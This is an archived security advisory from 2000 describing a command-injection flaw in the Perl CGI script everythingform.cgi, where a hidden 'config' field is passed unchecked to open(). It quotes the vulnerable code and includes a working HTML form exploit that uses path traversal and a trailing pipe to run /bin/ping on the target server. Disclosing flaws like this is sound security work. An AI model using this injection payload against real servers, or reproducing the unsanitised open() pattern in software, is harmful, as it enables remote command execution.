rpc-everythingform.txt

2000-12-19T00:00:00
ID PACKETSTORM:23882
Type packetstorm
Reporter RPC
Modified 2000-12-19T00:00:00

Description

                                        
                                            `Hi All,  
  
This is Yet Another Bad Perl Script. everythingform.cgi uses a hidden field  
'config' to determine where to read configuration data from.  
  
--code snippit--  
..  
$ConfigFile = $in{config};  
..  
open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in  
the ReadConfig subroutine. Reason: $!");  
------------  
  
Information regarding everythingform can be found at:  
http://www.conservatives.net/atheist/scripts/index.html?everythingform  
  
Sample exploit:  
  
<form action="http://www.conservatives.net/someplace/everythingform.cgi"  
method=POST>  
<h1>everythingform.cgi exploit</h1>  
Command: <input type=text name=config value="../../../../../../../../bin/ping  
-c 5 www.foobar.com|">  
<input type=hidden name=Name value="fuck the religious right">  
<input type=hidden name="e-mail" value="foo@bar.net">  
<input type=hidden name=FavoriteColor value=Black>  
<input type=submit value=run>  
</form>  
  
  
--rpc  
  
`